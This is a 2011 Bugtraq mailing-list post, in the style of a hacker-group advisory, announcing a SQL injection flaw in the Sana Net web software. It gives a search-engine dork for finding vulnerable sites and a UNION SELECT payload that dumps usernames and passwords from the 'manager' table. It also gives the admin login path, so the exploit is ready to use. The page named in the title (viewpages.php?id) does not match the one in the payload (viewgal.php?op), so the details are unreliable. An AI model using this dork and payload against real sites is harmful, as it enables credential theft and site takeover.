
Date: Thu, 1 Sep 2011 08:06:28 GMT
From: ehsan_hp200@...mail.com
To: bugtraq@...urityfocus.com
Subject: Sana Net (viewpages.php?id) Remote SQL injection Vulnerability

################################  IRANIAN THE BEST HACKERS IN THE WORLD ##################
#################### ####################
##
## Remote SQL injection Vulnerability
##
## Sana Net (viewpages.php?id)
##                           
###############################################################
###############################################################
###############################################################
###############################################################
##
## AuTh0r : Ehsan_Hp200
##
## H0ME   : www.ehsanhp.blogsky.com
##
## Email  : Ehsan_Hp200@...mail.com
##  
## Vendor : http://www.sana-net.com/
##  
## Persian Gulf 4 Ever!
#############################
#############################
#############################
#############################
#############################
##
##

Dork : inurl:"viewpages.php?id=" "&#1591;&#1585;&#1575;&#1581;&#1610; &#1608; &#1576;&#1585;&#1606;&#1575;&#1605;&#1607; &#1606;&#1608;&#1740;&#1587;&#1740; &#1575;&#1586; &#1588;&#1585;&#1705;&#1578; &#1591;&#1585;&#1575;&#1581;&#1575;&#1606; &#1587;&#1606;&#1575; &#1606;&#1578;"

Exploite:

www.victim.com/viewgal.php?op=-1 union select 1,concat(username,0x3a,password),3,4 from manager


#########################################################################################
Admin Panel : www.victim.com/adminsite/login-form.php
#########################################################################################
SpeCial TanX To : Skote_Vahshat
##########################################################################################
###############################  IRANIAN THE BEST HACKERS IN THE WORLD ##################    
